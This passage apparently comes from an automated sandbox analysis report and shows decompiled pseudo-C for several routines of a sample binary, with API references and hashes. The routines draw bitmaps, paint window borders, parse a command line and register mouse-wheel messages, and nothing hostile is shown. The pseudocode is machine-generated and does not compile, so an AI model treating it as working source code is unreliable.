                                  							E0040CAFC();
                                  						} else {
                                  							E0041EBB4();
                                  						}
                                  					}
                                  					_pop(_t295);
                                  					 *[fs:eax] = _t295;
                                  					_push(0x42385c);
                                  					if(_v56 != 0) {
                                  						_push(0xffffffff);
                                  						_push(_v56);
                                  						_push(_v20);
                                  						L004064E4();
                                  					}
                                  					return DeleteObject(SelectObject(_v20, _v48));
                                  				}
                                  			}

                                  0x00423751
                                  0x0042375b
                                  0x00423760
                                  0x00423761
                                  0x00423766
                                  0x00423769
                                  0x00423774
                                  0x0042377c
                                  0x0042377d
                                  0x00423787
                                  0x0042378a
                                  0x0042378c
                                  0x0042378e
                                  0x00423791
                                  0x00423792
                                  0x004237a1
                                  0x004237a6
                                  0x004237ac
                                  0x004237b1
                                  0x004237bf
                                  0x004237c2
                                  0x004237c7
                                  0x004237c8
                                  0x004237cb
                                  0x004237cc
                                  0x004237d1
                                  0x004237d7
                                  0x004237d8
                                  0x004237d8
                                  0x004237df
                                  0x004237e0
                                  0x004237e5
                                  0x004237e8
                                  0x004237eb
                                  0x004237ed
                                  0x004237f0
                                  0x004237f4
                                  0x004237f5
                                  0x004237f7
                                  0x004237f8
                                  0x004237fb
                                  0x004237fc
                                  0x00423801
                                  0x00423808
                                  0x00423811
                                  0x0042381a
                                  0x00423813
                                  0x00423813
                                  0x00423813
                                  0x00423811
                                  0x00423821
                                  0x00423824
                                  0x00423827
                                  0x00423830
                                  0x00423832
                                  0x00423837
                                  0x0042383b
                                  0x0042383c
                                  0x0042383c
                                  0x00423854
                                  0x00423854

                                  APIs
                                  • 72E7AC50.USER32(00000000,?,00000000,004239CB,?,?), ref: 00423718
                                  • 72E7A590.GDI32(00000001,00000000,00423881,?,00000000,00423919,?,00000000,?,00000000,004239CB,?,?), ref: 0042377D
                                  • 72E7A520.GDI32(00000001,00000001,00000001,00000001,00000000,00423881,?,00000000,00423919,?,00000000,?,00000000,004239CB,?,?), ref: 00423792
                                  • SelectObject.GDI32(?,00000000), ref: 0042379C
                                  • 72E7B410.GDI32(?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,00423881,?,00000000,00423919,?,00000000), ref: 004237CC
                                  • 72E7B150.GDI32(?,?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,00423881,?,00000000,00423919), ref: 004237D8
                                  • 72E7A7F0.GDI32(?,?,00000004,00000000,?,00000000,00000000,00423855,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 004237FC
                                  • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,00423855,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 0042380A
                                  • 72E7B410.GDI32(?,00000000,000000FF,0042385C,00000000,?,00000000,00000000,00423855,?,?,00000000,00000001,00000001,00000001,00000001), ref: 0042383C
                                  • SelectObject.GDI32(?,?), ref: 00423849
                                  • DeleteObject.GDI32(00000000), ref: 0042384F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Object$B410Select$A520A590B150DeleteErrorLast
                                  • String ID: ($BM
                                  • API String ID: 3415089252-2980357723
                                  • Opcode ID: 3038c8f3ed29e90559444b9e70a542dcf44815427a0d9b871c76df7af2bb2eb3
                                  • Instruction ID: e27723dd7574d1b027bccd993f69f9d76657a104af5ac3901e2869f95fea7946
                                  • Opcode Fuzzy Hash: 3038c8f3ed29e90559444b9e70a542dcf44815427a0d9b871c76df7af2bb2eb3
                                  • Instruction Fuzzy Hash: 7FD15F74A002189FDF14DFA9D885AAEBBF5FF48304F40846AF905AB391D73C9941CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004029D0(CHAR* __eax, void* __ecx, intOrPtr* __edx) {
                                  				CHAR* _t23;
                                  				CHAR* _t24;
                                  				CHAR* _t29;
                                  				CHAR* _t30;
                                  				CHAR* _t31;
                                  				CHAR* _t32;
                                  				intOrPtr* _t33;
                                  				void* _t34;
                                  				void* _t35;
                                  				intOrPtr _t36;
                                  				CHAR** _t37;
                                  
                                  				_t33 = __edx;
                                  				_t23 = __eax;
                                  				L2:
                                  				while(1) {
                                  					if( *_t23 != 0 &&  *_t23 <= 0x20) {
                                  						_t23 = CharNextA(_t23);
                                  						continue;
                                  					}
                                  					if( *_t23 != 0x22 || _t23[1] != 0x22) {
                                  						_t35 = 0;
                                  						 *_t37 = _t23;
                                  						while( *_t23 > 0x20) {
                                  							if( *_t23 != 0x22) {
                                  								_t29 = CharNextA(_t23);
                                  								_t35 = _t35 + _t29 - _t23;
                                  								_t23 = _t29;
                                  								continue;
                                  							}
                                  							_t23 = CharNextA(_t23);
                                  							while( *_t23 != 0 &&  *_t23 != 0x22) {
                                  								_t32 = CharNextA(_t23);
                                  								_t35 = _t35 + _t32 - _t23;
                                  								_t23 = _t32;
                                  							}
                                  							if( *_t23 != 0) {
                                  								_t23 = CharNextA(_t23);
                                  							}
                                  						}
                                  						E00404768(_t33, _t35);
                                  						_t24 =  *_t37;
                                  						_t36 =  *_t33;
                                  						_t34 = 0;
                                  						while( *_t24 > 0x20) {
                                  							if( *_t24 != 0x22) {
                                  								_t30 = CharNextA(_t24);
                                  								if(_t30 <= _t24) {
                                  									continue;
                                  								} else {
                                  									goto L27;
                                  								}
                                  								do {
                                  									L27:
                                  									 *((char*)(_t36 + _t34)) =  *_t24 & 0x000000ff;
                                  									_t24 =  &(_t24[1]);
                                  									_t34 = _t34 + 1;
                                  								} while (_t30 > _t24);
                                  								continue;
                                  							}
                                  							_t24 = CharNextA(_t24);
                                  							while( *_t24 != 0 &&  *_t24 != 0x22) {
                                  								_t31 = CharNextA(_t24);
                                  								if(_t31 <= _t24) {
                                  									continue;
                                  								} else {
                                  									goto L21;
                                  								}
                                  								do {
                                  									L21:
                                  									 *((char*)(_t36 + _t34)) =  *_t24 & 0x000000ff;
                                  									_t24 =  &(_t24[1]);
                                  									_t34 = _t34 + 1;
                                  								} while (_t31 > _t24);
                                  							}
                                  							if( *_t24 != 0) {
                                  								_t24 = CharNextA(_t24);
                                  							}
                                  						}
                                  						return _t24;
                                  					} else {
                                  						_t23 =  &(_t23[2]);
                                  						continue;
                                  					}
                                  				}
                                  			}















                                  APIs
                                  • CharNextA.USER32(00000000,?,?,00000000,00000002,?,00402B12,?,?,?,0046D0A3,00000000,0046D23E), ref: 00402A0A
                                  • CharNextA.USER32(00000000,00000000,?,?,00000000,00000002,?,00402B12,?,?,?,0046D0A3,00000000,0046D23E), ref: 00402A14
                                  • CharNextA.USER32(00000000,00000000,?,?,00000000,00000002,?,00402B12,?,?,?,0046D0A3,00000000,0046D23E), ref: 00402A33
                                  • CharNextA.USER32(00000000,?,?,00000000,00000002,?,00402B12,?,?,?,0046D0A3,00000000,0046D23E), ref: 00402A3D
                                  • CharNextA.USER32(00000000,00000000,?,?,00000000,00000002,?,00402B12,?,?,?,0046D0A3,00000000,0046D23E), ref: 00402A69
                                  • CharNextA.USER32(00000000,00000000,00000000,?,?,00000000,00000002,?,00402B12,?,?,?,0046D0A3,00000000,0046D23E), ref: 00402A73
                                  • CharNextA.USER32(00000000,00000000,00000000,?,?,00000000,00000002,?,00402B12,?,?,?,0046D0A3,00000000,0046D23E), ref: 00402A9B
                                  • CharNextA.USER32(00000000,00000000,?,?,00000000,00000002,?,00402B12,?,?,?,0046D0A3,00000000,0046D23E), ref: 00402AA5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CharNext
                                  • String ID: $ $ $"$"$"$"$"$"
                                  • API String ID: 3213498283-3597982963
                                  • Opcode ID: 0d0196756a8a4080e55c29058be7e4aba72a44c5f142b8481814641539d90697
                                  • Instruction ID: 44ec07a4bcdb557574acdaee91d33b08c8f1e99b3d8c415b53775f35736111de
                                  • Opcode Fuzzy Hash: 0d0196756a8a4080e55c29058be7e4aba72a44c5f142b8481814641539d90697
                                  • Instruction Fuzzy Hash: C33182957482D02AEB3366B58ECC32A39C54B9A354F1804FB9542BB3D7D9FC4841972E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 70%
                                  			E00422AC8(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                  				intOrPtr _v8;
                                  				void* _v12;
                                  				char _v13;
                                  				struct tagPOINT _v21;
                                  				struct HDC__* _v28;
                                  				void* _v32;
                                  				intOrPtr _t78;
                                  				struct HDC__* _t80;
                                  				signed int _t82;
                                  				signed int _t83;
                                  				signed int _t84;
                                  				char _t85;
                                  				struct HDC__* _t115;
                                  				void* _t136;
                                  				struct HDC__* _t160;
                                  				intOrPtr* _t164;
                                  				intOrPtr _t178;
                                  				intOrPtr _t180;
                                  				int* _t184;
                                  				intOrPtr _t186;
                                  				void* _t188;
                                  				void* _t189;
                                  				intOrPtr _t190;
                                  
                                  				_t165 = __ecx;
                                  				_t188 = _t189;
                                  				_t190 = _t189 + 0xffffffe4;
                                  				_t184 = __ecx;
                                  				_v8 = __edx;
                                  				_t164 = __eax;
                                  				_t186 =  *((intOrPtr*)(__eax + 0x28));
                                  				E0041E9AC(_v8, __ecx,  *0x422d14 & 0x000000ff);
                                  				E00423228(_t164);
                                  				_v12 = 0;
                                  				_v13 = 0;
                                  				_t78 =  *((intOrPtr*)(_t186 + 0x10));
                                  				if(_t78 != 0) {
                                  					_push(0xffffffff);
                                  					_push(_t78);
                                  					_t160 =  *(_v8 + 4);
                                  					_push(_t160);
                                  					L004064E4();
                                  					_v12 = _t160;
                                  					_push( *(_v8 + 4));
                                  					L004064B4();
                                  					_v13 = 1;
                                  				}
                                  				_push(0xc);
                                  				_t80 =  *(_v8 + 4);
                                  				_push(_t80);
                                  				L0040641C();
                                  				_push(_t80);
                                  				_push(0xe);
                                  				_t82 =  *(_v8 + 4);
                                  				L0040641C();
                                  				_t83 = _t82;
                                  				_t84 = _t83 * _t82;
                                  				if(_t84 > 8) {
                                  					L4:
                                  					_t85 = 0;
                                  				} else {
                                  					_t165 =  *(_t186 + 0x28) & 0x0000ffff;
                                  					if(_t84 < ( *(_t186 + 0x2a) & 0x0000ffff) * ( *(_t186 + 0x28) & 0x0000ffff)) {
                                  						_t85 = 1;
                                  					} else {
                                  						goto L4;
                                  					}
                                  				}
                                  				if(_t85 == 0) {
                                  					if(E00422E54(_t164) == 0) {
                                  						SetStretchBltMode(E0041E8D0(_v8), 3);
                                  					}
                                  				} else {
                                  					GetBrushOrgEx( *(_v8 + 4),  &_v21);
                                  					SetStretchBltMode( *(_v8 + 4), 4);
                                  					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
                                  				}
                                  				_push(_t188);
                                  				_push(0x422d06);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t190;
                                  				if( *((intOrPtr*)( *_t164 + 0x28))() != 0) {
                                  					E004231C8(_t164, _t165);
                                  				}
                                  				E0041E9AC(E00422D98(_t164), _t165,  *0x422d14 & 0x000000ff);
                                  				if( *((intOrPtr*)( *_t164 + 0x28))() == 0) {
                                  					StretchBlt( *(_v8 + 4),  *_t184, _t184[1], _t184[2] -  *_t184, _t184[3] - _t184[1],  *(E00422D98(_t164) + 4), 0, 0,  *(_t186 + 0x1c),  *(_t186 + 0x20),  *(_v8 + 0x20));
                                  					_pop(_t178);
                                  					 *[fs:eax] = _t178;
                                  					_push(0x422d0d);
                                  					if(_v13 != 0) {
                                  						_push(0xffffffff);
                                  						_push(_v12);
                                  						_t115 =  *(_v8 + 4);
                                  						_push(_t115);
                                  						L004064E4();
                                  						return _t115;
                                  					}
                                  					return 0;
                                  				} else {
                                  					_v32 = 0;
                                  					_v28 = 0;
                                  					_push(_t188);
                                  					_push(0x422c9b);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t190;
                                  					L00406374();
                                  					_v28 = E0041ECD4(0);
                                  					_v32 = SelectObject(_v28,  *(_t186 + 0xc));
                                  					E0041EE84( *(_v8 + 4), _t164, _t184[1],  *_t184, _t184, _t186, 0, 0, _v28,  *(_t186 + 0x20),  *(_t186 + 0x1c), 0, 0,  *(E00422D98(_t164) + 4), _t184[3] - _t184[1], _t184[2] -  *_t184);
                                  					_t136 = 0;
                                  					_t180 = 0;
                                  					 *[fs:eax] = _t180;
                                  					_push(0x422ce0);
                                  					if(_v32 != 0) {
                                  						_t136 = SelectObject(_v28, _v32);
                                  					}
                                  					if(_v28 != 0) {
                                  						return DeleteDC(_v28);
                                  					}
                                  					return _t136;
                                  				}
                                  			}



























                                  APIs
                                    • Part of subcall function 00423228: 72E7AC50.USER32(00000000,?,?,?,?,00421C83,00000000,00421D0F), ref: 0042327E
                                    • Part of subcall function 00423228: 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00421C83,00000000,00421D0F), ref: 00423293
                                    • Part of subcall function 00423228: 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00421C83,00000000,00421D0F), ref: 0042329D
                                    • Part of subcall function 00423228: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00421C83,00000000,00421D0F), ref: 004232C1
                                    • Part of subcall function 00423228: 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,00421C83,00000000,00421D0F), ref: 004232CC
                                  • 72E7B410.GDI32(?,?,000000FF), ref: 00422B0B
                                  • 72E7B150.GDI32(?,?,?,000000FF), ref: 00422B1A
                                  • 72E7AD70.GDI32(?,0000000C), ref: 00422B2C
                                  • 72E7AD70.GDI32(?,0000000E,00000000,?,0000000C), ref: 00422B3B
                                  • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 00422B6E
                                  • SetStretchBltMode.GDI32(?,00000004), ref: 00422B7C
                                  • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00422B94
                                  • SetStretchBltMode.GDI32(00000000,00000003), ref: 00422BB1
                                  • 72E7A590.GDI32(00000000,00000000,00422C9B,?,?,0000000E,00000000,?,0000000C), ref: 00422C12
                                  • SelectObject.GDI32(?,?), ref: 00422C27
                                  • SelectObject.GDI32(?,00000000), ref: 00422C86
                                  • DeleteDC.GDI32(00000000), ref: 00422C95
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: BrushModeObjectSelectStretch$A590B150B380B410CreateDeleteHalftonePalette
                                  • String ID:
                                  • API String ID: 2051775979-0
                                  • Opcode ID: 68240e5f66cd39e59641131e3f8c2fb30c7438ea1fdd6b434881b86328a201e0
                                  • Instruction ID: 1018d1ef3d05885111cd4e3f119a6ce98d3d1eab0ce21db22eb6a5c8b17d6e0f
                                  • Opcode Fuzzy Hash: 68240e5f66cd39e59641131e3f8c2fb30c7438ea1fdd6b434881b86328a201e0
                                  • Instruction Fuzzy Hash: 9E713A75B00215BFCB50DFA9D985F5ABBF8AF08300F51856AB509E7282D678ED10CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 51%
                                  			E0041ECE4(struct HDC__* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                                  				void* _v8;
                                  				int _v12;
                                  				int _v16;
                                  				void* _v20;
                                  				int _v24;
                                  				struct HDC__* _v28;
                                  				struct HDC__* _v32;
                                  				int _v48;
                                  				int _v52;
                                  				void _v56;
                                  				int _t37;
                                  				void* _t41;
                                  				int _t43;
                                  				void* _t47;
                                  				void* _t72;
                                  				intOrPtr _t79;
                                  				intOrPtr _t80;
                                  				void* _t85;
                                  				void* _t87;
                                  				void* _t88;
                                  				intOrPtr _t89;
                                  
                                  				_t87 = _t88;
                                  				_t89 = _t88 + 0xffffffcc;
                                  				asm("movsd");
                                  				asm("movsd");
                                  				_t71 = __ecx;
                                  				_v8 = __eax;
                                  				_push(0);
                                  				L00406374();
                                  				_v28 = __eax;
                                  				_push(0);
                                  				L00406374();
                                  				_v32 = __eax;
                                  				_push(_t87);
                                  				_push(0x41ee32);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t89;
                                  				_t37 = GetObjectA(_v8, 0x18,  &_v56);
                                  				if(__ecx == 0) {
                                  					_push(0);
                                  					L004066E4();
                                  					_v24 = _t37;
                                  					if(_v24 == 0) {
                                  						E0041EC2C(__ecx);
                                  					}
                                  					_push(_t87);
                                  					_push(0x41eda1);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t89;
                                  					_push(_v12);
                                  					_push(_v16);
                                  					_t41 = _v24;
                                  					_push(_t41);
                                  					L0040636C();
                                  					_v20 = _t41;
                                  					if(_v20 == 0) {
                                  						E0041EC2C(_t71);
                                  					}
                                  					_pop(_t79);
                                  					 *[fs:eax] = _t79;
                                  					_push(0x41eda8);
                                  					_t43 = _v24;
                                  					_push(_t43);
                                  					_push(0);
                                  					L00406944();
                                  					return _t43;
                                  				} else {
                                  					_push(0);
                                  					_push(1);
                                  					_push(1);
                                  					_push(_v12);
                                  					_t47 = _v16;
                                  					_push(_t47);
                                  					L0040635C();
                                  					_v20 = _t47;
                                  					if(_v20 != 0) {
                                  						_t72 = SelectObject(_v28, _v8);
                                  						_t85 = SelectObject(_v32, _v20);
                                  						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
                                  						if(_t72 != 0) {
                                  							SelectObject(_v28, _t72);
                                  						}
                                  						if(_t85 != 0) {
                                  							SelectObject(_v32, _t85);
                                  						}
                                  					}
                                  					_pop(_t80);
                                  					 *[fs:eax] = _t80;
                                  					_push(0x41ee39);
                                  					DeleteDC(_v28);
                                  					return DeleteDC(_v32);
                                  				}
                                  			}

                                  APIs
                                  • 72E7A590.GDI32(00000000), ref: 0041ECFB
                                  • 72E7A590.GDI32(00000000,00000000), ref: 0041ED05
                                  • GetObjectA.GDI32(?,00000018,?), ref: 0041ED25
                                  • 72E7A410.GDI32(?,?,00000001,00000001,00000000,?,00000018,?,00000000,0041EE32,?,00000000,00000000), ref: 0041ED3C
                                  • 72E7AC50.USER32(00000000,?,00000018,?,00000000,0041EE32,?,00000000,00000000), ref: 0041ED48
                                  • 72E7A520.GDI32(00000000,?,?,00000000,0041EDA1,?,00000000,?,00000018,?,00000000,0041EE32,?,00000000,00000000), ref: 0041ED75
                                  • 72E7B380.USER32(00000000,00000000,0041EDA8,00000000,0041EDA1,?,00000000,?,00000018,?,00000000,0041EE32,?,00000000,00000000), ref: 0041ED9B
                                  • SelectObject.GDI32(?,?), ref: 0041EDB6
                                  • SelectObject.GDI32(?,00000000), ref: 0041EDC5
                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0041EDF1
                                  • SelectObject.GDI32(?,00000000), ref: 0041EDFF
                                  • SelectObject.GDI32(?,00000000), ref: 0041EE0D
                                  • DeleteDC.GDI32(?), ref: 0041EE23
                                  • DeleteDC.GDI32(?), ref: 0041EE2C
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Object$Select$A590Delete$A410A520B380Stretch
                                  • String ID:
                                  • API String ID: 956127455-0
                                  • Opcode ID: b70c58a1b7a1e92f63c0cf40117c06db130ebad8a985d91a85943b9317bd30f3
                                  • Instruction ID: c19eca584f9691c187b98bd90bd9418c9b4b0e0babf77e61b71081cbceb9e1ba
                                  • Opcode Fuzzy Hash: b70c58a1b7a1e92f63c0cf40117c06db130ebad8a985d91a85943b9317bd30f3
                                  • Instruction Fuzzy Hash: B1410A75E00219AFDB10DBE9DC42FAFB7FCEB49704F110466BA05F7281C67999508BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 56%
                                  			E0043C874(intOrPtr* __eax, intOrPtr __edx) {
                                  				intOrPtr* _v8;
                                  				intOrPtr _v12;
                                  				struct HDC__* _v16;
                                  				struct tagRECT _v32;
                                  				struct tagRECT _v48;
                                  				void* _v64;
                                  				struct HDC__* _t116;
                                  				void* _t170;
                                  				signed int _t173;
                                  				intOrPtr* _t179;
                                  				intOrPtr* _t182;
                                  				intOrPtr _t189;
                                  				signed int _t192;
                                  				intOrPtr _t214;
                                  				signed int _t215;
                                  				void* _t230;
                                  				void* _t233;
                                  				void* _t235;
                                  				intOrPtr _t236;
                                  
                                  				_t233 = _t235;
                                  				_t236 = _t235 + 0xffffffc4;
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				if( *(_v8 + 0x16d) != 0 ||  *(_v8 + 0x174) > 0) {
                                  					_t116 = E0043BA58(_v8);
                                  					_push(_t116);
                                  					L004067EC();
                                  					_v16 = _t116;
                                  					_push(_t233);
                                  					_push(0x43cad1);
                                  					_push( *[fs:ecx]);
                                  					 *[fs:ecx] = _t236;
                                  					GetClientRect(E0043BA58(_v8),  &_v32);
                                  					GetWindowRect(E0043BA58(_v8),  &_v48);
                                  					MapWindowPoints(0, E0043BA58(_v8),  &_v48, 2);
                                  					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
                                  					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					InflateRect( &_v32,  *(_v8 + 0x174),  *(_v8 + 0x174));
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					_t192 = GetWindowLongA(E0043BA58(_v8), 0xfffffff0);
                                  					if((_t192 & 0x00200000) != 0) {
                                  						_t182 =  *0x46fb00; // 0x470904
                                  						_v48.right = _v48.right +  *((intOrPtr*)( *_t182))(0x14);
                                  					}
                                  					if((_t192 & 0x00100000) != 0) {
                                  						_t179 =  *0x46fb00; // 0x470904
                                  						_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t179))(0x15);
                                  					}
                                  					if( *(_v8 + 0x16d) != 0) {
                                  						_t230 = 0;
                                  						_t215 =  *(_v8 + 0x16b) & 0x000000ff;
                                  						if(_t215 != 0) {
                                  							_t230 = 0 +  *((intOrPtr*)(_v8 + 0x170));
                                  						}
                                  						_t173 =  *(_v8 + 0x16c) & 0x000000ff;
                                  						if(_t173 != 0) {
                                  							_t230 = _t230 +  *((intOrPtr*)(_v8 + 0x170));
                                  						}
                                  						if(( *(_v8 + 0x16a) & 0x00000001) != 0) {
                                  							_v48.left = _v48.left - _t230;
                                  						}
                                  						if(( *(_v8 + 0x16a) & 0x00000002) != 0) {
                                  							_v48.top = _v48.top - _t230;
                                  						}
                                  						if(( *(_v8 + 0x16a) & 0x00000004) != 0) {
                                  							_v48.right = _v48.right + _t230;
                                  						}
                                  						if(( *(_v8 + 0x16a) & 0x00000008) != 0) {
                                  							_v48.bottom = _v48.bottom + _t230;
                                  						}
                                  						DrawEdge(_v16,  &_v48,  *(0x46edbc + (_t215 & 0x0000007f) * 4) |  *(0x46edcc + (_t173 & 0x0000007f) * 4),  *(_v8 + 0x16a) & 0x000000ff |  *(0x46eddc + ( *(_v8 + 0x16d) & 0x000000ff) * 4) |  *(0x46edec + ( *(_v8 + 0x1ad) & 0x000000ff) * 4) | 0x00002000);
                                  					}
                                  					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
                                  					FillRect(_v16,  &_v48, E0041DEAC( *((intOrPtr*)(_v8 + 0x178))));
                                  					_pop(_t214);
                                  					 *[fs:eax] = _t214;
                                  					_push(0x43cad8);
                                  					_push(_v16);
                                  					_t170 = E0043BA58(_v8);
                                  					_push(_t170);
                                  					L00406944();
                                  					return _t170;
                                  				} else {
                                  					 *((intOrPtr*)( *_v8 - 0x10))();
                                  					_t189 = E00427D34(E00427C2C());
                                  					if(_t189 != 0) {
                                  						_t189 = _v8;
                                  						if(( *(_t189 + 0x52) & 0x00000002) != 0) {
                                  							_t189 = E00428300(E00427C2C(), 0, _v8);
                                  						}
                                  					}
                                  					return _t189;
                                  				}
                                  			}

                                  APIs
                                  • 72E7B080.USER32(00000000), ref: 0043C8A8
                                  • GetClientRect.USER32 ref: 0043C8CB
                                  • GetWindowRect.USER32 ref: 0043C8DD
                                  • MapWindowPoints.USER32 ref: 0043C8F3
                                  • OffsetRect.USER32(?,?,?), ref: 0043C908
                                  • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 0043C921
                                  • InflateRect.USER32(?,00000000,00000000), ref: 0043C93F
                                  • GetWindowLongA.USER32 ref: 0043C959
                                  • DrawEdge.USER32(?,?,?,00000008), ref: 0043CA58
                                  • IntersectClipRect.GDI32(?,?,?,?,?), ref: 0043CA71
                                  • OffsetRect.USER32(?,?,?), ref: 0043CA90
                                  • FillRect.USER32 ref: 0043CAAC
                                  • 72E7B380.USER32(00000000,?,0043CAD8,?,?,?,?,?,?,?,?,00000000,000000F0,?,00000000,00000000), ref: 0043CACB
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Rect$Window$ClipOffset$B080B380ClientDrawEdgeExcludeFillInflateIntersectLongPoints
                                  • String ID:
                                  • API String ID: 156109915-0
                                  • Opcode ID: 255f1251702d0cfd4db5fbefcfb9a5a4243f6538ed010eff58d35a35f526c58a
                                  • Instruction ID: 6a11cf93cadaabe11ecd7179de64b2f71a6741c0a28c7ab0443192d99c98652f
                                  • Opcode Fuzzy Hash: 255f1251702d0cfd4db5fbefcfb9a5a4243f6538ed010eff58d35a35f526c58a
                                  • Instruction Fuzzy Hash: FD81EE71E00148AFCB01DBA9D885BEEB7F9AF09304F1540AAF515F7291C779AE05CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00406B74(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
                                  				intOrPtr* _v8;
                                  				struct HWND__* _t19;
                                  				int* _t20;
                                  				int* _t26;
                                  				int* _t27;
                                  
                                  				_t26 = _t20;
                                  				_t27 = __edx;
                                  				_v8 = __eax;
                                  				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
                                  				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
                                  				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
                                  				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
                                  				if( *_t27 == 0 || _t19 == 0) {
                                  					 *_a8 = 0;
                                  				} else {
                                  					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
                                  				}
                                  				if( *_t26 == 0 || _t19 == 0) {
                                  					 *_a4 = 3;
                                  				} else {
                                  					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
                                  				}
                                  				return _t19;
                                  			}

                                  APIs
                                  • FindWindowA.USER32 ref: 00406B8C
                                  • RegisterClipboardFormatA.USER32 ref: 00406B98
                                  • RegisterClipboardFormatA.USER32 ref: 00406BA7
                                  • RegisterClipboardFormatA.USER32 ref: 00406BB3
                                  • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00406BCB
                                  • SendMessageA.USER32(00000000,?,00000000,00000000), ref: 00406BEF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
